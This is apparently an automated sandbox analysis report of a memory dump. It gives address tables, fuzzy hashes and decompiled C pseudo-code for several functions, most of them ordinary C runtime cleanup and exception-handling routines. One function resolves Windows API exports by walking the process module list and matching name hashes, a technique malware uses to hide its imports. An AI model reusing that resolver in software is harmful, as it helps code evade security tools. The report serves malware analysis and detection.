0x00000000
0x6eda7169
0x6eda7164
0x6eda715f
0x6eda7203
0x6eda7204
0x00000000
0x6eda718b
0x6eda718b
0x6eda7191
0x6eda7199
0x6eda719e
0x6eda719e
0x6eda71ad
0x6eda71ad
0x6eda71b5
0x6eda71bb
0x6eda71c1
0x6eda71c8
0x6eda71cb
0x6eda71cd
0x6eda71dd
0x6eda71e2
0x00000000
0x6eda70d6
0x6eda70d6
0x6eda70e7
0x6eda70e7
0x6eda720a
0x6eda720a
0x6eda7211
0x6eda7212
0x6eda721a
0x6eda721f
0x6eda7220
0x6eda7032
0x6eda7035
0x6eda7037
0x6eda704c
0x00000000
0x6eda7039
0x6eda7039
0x6eda703f
0x6eda7044
0x6eda7037
0x6eda7225
0x6eda7226
0x6eda7228
0x6eda7231
0x00000000
0x00000000
0x00000000
0x6eda6f7a
0x6eda6f4b
0x6eda6f4d
0x6eda6f4e
0x6eda6f52
0x6eda6f52

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b04f143d0f4cd77c22fbdda26de7a6be74a2020f64fca9f540b826df0abc25
Instruction ID: d3eda67f63898f149df5827c31707c73070cedb1971d6af86aa8a15197888da5
Opcode Fuzzy Hash: 78b04f143d0f4cd77c22fbdda26de7a6be74a2020f64fca9f540b826df0abc25
Instruction Fuzzy Hash: 3941AEB1804219AFDB10CFADCC88AEEBBB8AF45304F1442D9E51DA3244DA359E848F64

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA2ED0, Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA2ED0(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr* _t54;
				signed int _t56;
				signed int _t69;
				intOrPtr* _t70;
				signed char _t71;
				intOrPtr _t73;
				signed int _t77;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t85;
				signed int _t87;
				signed short _t91;
				signed int _t92;
				signed short* _t93;
				intOrPtr* _t95;

				_v20 = __ecx;
				_v24 = __edx;
				_t70 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t73 =  *((intOrPtr*)(_t70 + 0x18));
				_v8 = _t73;
				if(_t73 == 0) {
					L16:
					return 0;
				} else {
					do {
						_t49 =  *((intOrPtr*)(_t70 + 0x2c));
						_t93 =  *(_t70 + 0x30);
						_t70 =  *_t70;
						_v36 = _t49;
						_v28 = _t70;
						_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x3c)) + _t73 + 0x78));
						if(_t51 != 0) {
							_t91 =  *_t93 & 0x0000ffff;
							_t83 = _t51 + _t73;
							_v16 =  *((intOrPtr*)(_t83 + 0x18));
							_v32 = _t83;
							_t54 =  *((intOrPtr*)(_t83 + 0x20)) + _t73;
							_t84 = 0;
							_v12 = _t54;
							if(_t91 != 0) {
								do {
									_t93 =  &(_t93[1]);
									_t81 =  >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff;
									_t67 = ( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff;
									_t84 = _t84 * 0x00000101 + (( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff) ^ (( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff) << 0x00000010;
									_t69 =  *_t93 & 0x0000ffff;
									_t91 = _t69;
								} while (_t69 != 0);
								_t54 = _v12;
								_t73 = _v8;
							}
							if(_t84 == _v20) {
								_t85 = _v16;
								_t92 = 0;
								if(_t85 != 0) {
									do {
										_t95 =  *_t54 + _t73;
										_v12 = _t54 + 4;
										_t56 = 0;
										_t71 =  *_t95;
										if(_t71 != 0) {
											do {
												_t87 = _t71 + 0x00000020 & 0x000000ff;
												_t95 = _t95 + 1;
												_t77 = _t71 & 0x000000ff;
												_t71 =  *_t95;
												_t88 =  >=  ? _t77 : _t87;
												_t78 =  >=  ? _t77 : _t87;
												_t56 = _t56 * 0x00000101 + ( >=  ? _t77 : _t87) ^ ( >=  ? _t77 : _t87) << 0x00000010;
											} while (_t71 != 0);
											_t73 = _v8;
											_t85 = _v16;
										}
										if(_t56 == _v24) {
											return  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0x1c)) + ( *( *((intOrPtr*)(_v32 + 0x24)) + _t92 * 2 + _t73) & 0x0000ffff) * 4 + _v8)) + _v8;
										} else {
											goto L13;
										}
										goto L18;
										L13:
										_t54 = _v12;
										_t92 = _t92 + 1;
									} while (_t92 < _t85);
									_t70 = _v28;
								}
							}
						}
						goto L15;
						L15:
						_t73 =  *((intOrPtr*)(_t70 + 0x18));
						_v8 = _t73;
					} while (_t73 != 0);
					goto L16;
				}
				L18:
			}

0x6eda2edd
0x6eda2ee5
0x6eda2ee8
0x6eda2eeb
0x6eda2eee
0x6eda2ef3
0x6eda2fe1
0x6eda2fe7
0x6eda2f00
0x6eda2f00
0x6eda2f00
0x6eda2f03
0x6eda2f06
0x6eda2f08
0x6eda2f0e
0x6eda2f11
0x6eda2f17
0x6eda2f1d
0x6eda2f20
0x6eda2f26
0x6eda2f2c
0x6eda2f2f
0x6eda2f31
0x6eda2f33
0x6eda2f39
0x6eda2f40
0x6eda2f4a
0x6eda2f50
0x6eda2f59
0x6eda2f61
0x6eda2f63
0x6eda2f66
0x6eda2f68
0x6eda2f6d
0x6eda2f70
0x6eda2f70
0x6eda2f76
0x6eda2f78
0x6eda2f7b
0x6eda2f7f
0x6eda2f81
0x6eda2f86
0x6eda2f88
0x6eda2f8b
0x6eda2f8d
0x6eda2f91
0x6eda2f93
0x6eda2f99
0x6eda2f9c
0x6eda2f9f
0x6eda2fa2
0x6eda2fa4
0x6eda2fad
0x6eda2fb5
0x6eda2fb7
0x6eda2fbb
0x6eda2fbe
0x6eda2fbe
0x6eda2fc4
0x6eda3009
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda2fc6
0x6eda2fc6
0x6eda2fc9
0x6eda2fca
0x6eda2fce
0x6eda2fce
0x6eda2f7f
0x6eda2f76
0x00000000
0x6eda2fd1
0x6eda2fd1
0x6eda2fd4
0x6eda2fd7
0x00000000
0x6eda2f00
0x00000000

Strings

KERNEL32.dll, xrefs: 6EDA2EE4

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: KERNEL32.dll
API String ID: 0-254546324
Opcode ID: a1c4d86223f696fbba127bb73baace05ee902a0359a7f9fe915c49917d7f71b1
Instruction ID: 61bc688e8a326de2dc170d0e8967a6ff671933a4a297b71dd6d56a2440b83abb
Opcode Fuzzy Hash: a1c4d86223f696fbba127bb73baace05ee902a0359a7f9fe915c49917d7f71b1
Instruction Fuzzy Hash: 43418B75B0011ACFDB48CF9AC490AAAB7F2FF49314B1581AEDD849B755D730EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA863C, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA863C() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x6edc4230 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x6eda863c
0x6eda8644
0x6eda864c

APIs

GetProcessHeap.KERNEL32 ref: 6EDA863C

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b53032c1443da3a159675da2917a656faaf6a26a5c90a867319bba2bc37c0ed6
Instruction ID: 93820dd62dffe692a7e7816fc9ac9c67a254b0f9bdf3bbe240b19bc8190d1b5a
Opcode Fuzzy Hash: b53032c1443da3a159675da2917a656faaf6a26a5c90a867319bba2bc37c0ed6
Instruction Fuzzy Hash: ECA01130200A028BAB008E38830E20CBABCAA02AC03000028A808C8000EB2080828A0A

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA3380, Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
Instruction ID: 523dc6b933fc3e47268505fc8a2ec1c6346eb23c80df3ffd961e888a6dfc3291
Opcode Fuzzy Hash: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
Instruction Fuzzy Hash: 24D1AB75A0421ACFDB50CF9CC894BAEB7B2FF44714F2981A9DA04AB345D774EA51CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6835, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA6835(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6EDA83A4(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6eda6842
0x6eda6844
0x6eda6847
0x6eda684a
0x6eda684d
0x6eda685e
0x6eda6860
0x6eda684f
0x6eda6853
0x6eda685c
0x00000000
0x00000000
0x6eda685c
0x6eda6867

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
Instruction ID: c6d2c35dfea7197858e26b36fff0db2b605f0cb596d1468e87704de908bbb5c2
Opcode Fuzzy Hash: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
Instruction Fuzzy Hash: 8AE04632922228EB8714DBDCC904A9AF3ACEB09A10B11059ABA14D7201D672DE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA91F7, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA91F7(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6edc36f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6EDA6B43(_t46);
							E6EDAB129( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6EDA6B43(_t47);
							E6EDAB227( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6EDA6B43( *((intOrPtr*)(_t74 + 0x7c)));
						E6EDA6B43( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6EDA936A( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6edc3640) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6EDA6B43(_t31);
							E6EDA6B43( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe87
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6EDA6B43(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6EDA6B43(_t74);
			}

0x6eda91ff
0x6eda9203
0x6eda920b
0x6eda9214
0x6eda9219
0x6eda9220
0x6eda9228
0x6eda9230
0x6eda923b
0x6eda9241
0x6eda9242
0x6eda924a
0x6eda9252
0x6eda925d
0x6eda9263
0x6eda9267
0x6eda9272
0x6eda9278
0x6eda9219
0x6eda9279
0x6eda9281
0x6eda9294
0x6eda92a7
0x6eda92b5
0x6eda92c0
0x6eda92c5
0x6eda92ce
0x6eda92d6
0x6eda92d7
0x6eda92dd
0x6eda92e0
0x6eda92e3
0x6eda92ea
0x6eda92ec
0x6eda92f0
0x6eda92f8
0x6eda92ff
0x6eda9305
0x6eda9306
0x6eda9306
0x6eda930d
0x6eda930f
0x6eda930f
0x6eda9314
0x6eda931c
0x6eda9321
0x6eda9322
0x6eda9322
0x6eda9325
0x6eda9328
0x6eda932b
0x6eda932e
0x6eda932e
0x6eda9340

APIs

___free_lconv_mon.LIBCMT ref: 6EDA923B

Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB146
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB158
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB16A
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB17C
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB18E
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1A0
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1B2
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1C4
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1D6
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1E8
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1FA
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB20C
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB21E

_free.LIBCMT ref: 6EDA9230

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDA9252
_free.LIBCMT ref: 6EDA9267
_free.LIBCMT ref: 6EDA9272
_free.LIBCMT ref: 6EDA9294
_free.LIBCMT ref: 6EDA92A7
_free.LIBCMT ref: 6EDA92B5
_free.LIBCMT ref: 6EDA92C0
_free.LIBCMT ref: 6EDA92F8
_free.LIBCMT ref: 6EDA92FF
_free.LIBCMT ref: 6EDA931C
_free.LIBCMT ref: 6EDA9334

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f2ed30e41ee3401bf1e6fe1dfb64ced4573905232f5de71896af971dbe39bb73
Instruction ID: fee70203a665c3eb1005dd9ba4b2ea0f1fac787a8aa29ccc052f19b358f811a7
Opcode Fuzzy Hash: f2ed30e41ee3401bf1e6fe1dfb64ced4573905232f5de71896af971dbe39bb73
Instruction Fuzzy Hash: 5A315E31514305DFEB508BBEE944B9AB3E9EF01354F544929E669D7190EB32EB408720

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA63FD, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EDA63FD(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6edaec18;
				if(_t68 != 0x6edaec18) {
					E6EDA6B43(_t68);
					_t36 = _a4;
				}
				E6EDA6B43( *((intOrPtr*)(_t36 + 0x3c)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x30)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x34)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x38)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x28)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x2c)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x40)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x44)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6EDA6245(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6EDA62A6(_t67, _t72, _t73, _t77);
			}

0x6eda63fd
0x6eda63fd
0x6eda63fd
0x6eda6402
0x6eda6408
0x6eda640a
0x6eda6410
0x6eda6413
0x6eda6418
0x6eda641b
0x6eda641f
0x6eda642a
0x6eda6435
0x6eda6440
0x6eda644b
0x6eda6456
0x6eda6461
0x6eda646c
0x6eda647a
0x6eda6485
0x6eda648d
0x6eda648e
0x6eda6491
0x6eda6497
0x6eda649b
0x6eda649f
0x6eda64a0
0x6eda64aa
0x6eda64b0
0x6eda64b1
0x6eda64b4
0x6eda64ba
0x6eda64be
0x6eda64c2
0x6eda64cb

APIs

_free.LIBCMT ref: 6EDA6413

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDA641F
_free.LIBCMT ref: 6EDA642A
_free.LIBCMT ref: 6EDA6435
_free.LIBCMT ref: 6EDA6440
_free.LIBCMT ref: 6EDA644B
_free.LIBCMT ref: 6EDA6456
_free.LIBCMT ref: 6EDA6461
_free.LIBCMT ref: 6EDA646C
_free.LIBCMT ref: 6EDA647A

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4e40cbe883cb4878703dd689a6c407913b60ba4018aba69a585cb100f9b2e910
Instruction ID: c04a3ed86093093d071a1f9eb81a637bbd1a942660d79ab9b7498959fd49eb9e
Opcode Fuzzy Hash: 4e40cbe883cb4878703dd689a6c407913b60ba4018aba69a585cb100f9b2e910
Instruction Fuzzy Hash: DA21C77692410CEFCB41DFDDC884DDEBBB9EF08300B0445A6A6259B160EB71EB448B90

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA43B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6EDA43B0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t110;

				_t87 = __edx;
				_push(__ebx);
				_t73 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t73 = E6EDAD610(__ecx,  *_t73);
				_t74 = _a8;
				_t6 = _t74 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t74 + 8) ^  *0x6edc3004;
				E6EDA4370(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x6edc3004);
				E6EDA4957(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t91 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E6EDA4940(_t74, 0xfffffffe, _t94, 0x6edc3004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t60 = _t91 + (_t91 + 2) * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
							_t61 = _t78 + _t60 * 4;
							_t79 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t62 = E6EDA48E0(_t79, _t94);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E6EDA4370(_t74, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x6edae15c;
											if(__eflags != 0) {
												_t69 = E6EDAD4B0(__eflags, 0x6edae15c);
												_t103 = _t103 + 4;
												__eflags = _t69;
												if(_t69 != 0) {
													_t98 =  *0x6edae15c; // 0x6eda4585
													 *0x6edae104(_a4, 1);
													 *_t98();
													_t94 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t88 = _t63;
										E6EDA4920(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
											_t88 = _t91;
											E6EDA4940(_t65, _t91, _t94, 0x6edc3004);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
										_t66 = E6EDA4370(_t74, _t88, _t91, _t94, _v12);
										E6EDA4900();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t99, _t94);
										__eflags = _t66;
										if(_t66 != 0) {
											_push(_t94);
											do {
												_t96 =  *_t66;
												E6EDA5FD1(_t66);
												_t66 = _t96;
												__eflags = _t96;
											} while (_t96 != 0);
											return _t66;
										}
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t91 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x6eda43b0
0x6eda43b6
0x6eda43b7
0x6eda43bb
0x6eda43bc
0x6eda43c2
0x6eda43ce
0x6eda43d0
0x6eda43d6
0x6eda43d6
0x6eda43df
0x6eda43e1
0x6eda43e4
0x6eda43e7
0x6eda43ef
0x6eda43f4
0x6eda43f7
0x6eda43fa
0x6eda4401
0x6eda445d
0x6eda4460
0x6eda4468
0x6eda446f
0x00000000
0x6eda446f
0x00000000
0x6eda4403
0x6eda4403
0x6eda4409
0x6eda440f
0x6eda4415
0x6eda4480
0x6eda4489
0x6eda4417
0x6eda4417
0x6eda4417
0x6eda441d
0x6eda4420
0x6eda4423
0x6eda4426
0x6eda4429
0x6eda442e
0x6eda4444
0x00000000
0x6eda4430
0x6eda4430
0x6eda4432
0x6eda4437
0x6eda4439
0x6eda443c
0x6eda443e
0x6eda4454
0x6eda4474
0x6eda4474
0x6eda4478
0x00000000
0x6eda4440
0x6eda4440
0x6eda448a
0x6eda448d
0x6eda4493
0x6eda4495
0x6eda449c
0x6eda44a3
0x6eda44a8
0x6eda44ab
0x6eda44ad
0x6eda44af
0x6eda44bc
0x6eda44c2
0x6eda44c4
0x6eda44c7
0x6eda44c7
0x6eda44ca
0x6eda44ca
0x6eda449c
0x6eda44d0
0x6eda44d2
0x6eda44d7
0x6eda44da
0x6eda44dd
0x6eda44e5
0x6eda44e9
0x6eda44ee
0x6eda44ee
0x6eda44f5
0x6eda44f8
0x6eda4508
0x6eda450d
0x6eda4514
0x6eda451a
0x6eda451c
0x6eda451e
0x6eda451f
0x6eda451f
0x6eda4522
0x6eda4527
0x6eda452a
0x6eda452a
0x00000000
0x6eda452e
0x6eda4530
0x6eda4442
0x00000000
0x6eda4442
0x6eda4440
0x6eda443e
0x00000000
0x6eda4447
0x6eda4447
0x6eda4449
0x6eda4450
0x00000000
0x6eda4452
0x00000000
0x6eda4450
0x6eda4415
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6EDA43E7
___except_validate_context_record.LIBVCRUNTIME ref: 6EDA43EF
_ValidateLocalCookies.LIBCMT ref: 6EDA4478
__IsNonwritableInCurrentImage.LIBCMT ref: 6EDA44A3
_ValidateLocalCookies.LIBCMT ref: 6EDA44F8

Strings

csm, xrefs: 6EDA448D

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 43d498b883869f491b085736dd0c27f921ff88a98f7f9083e81042c05d651716
Instruction ID: bb14fcfa1c12384113d3a3affc7c2509a9eff0e432c10ab5b00696a16f017b15
Opcode Fuzzy Hash: 43d498b883869f491b085736dd0c27f921ff88a98f7f9083e81042c05d651716
Instruction Fuzzy Hash: 3B41A634900119DFCF10CFACD884A9EBBB9AF45328F148559EA185B391DBB1DB17CBA1

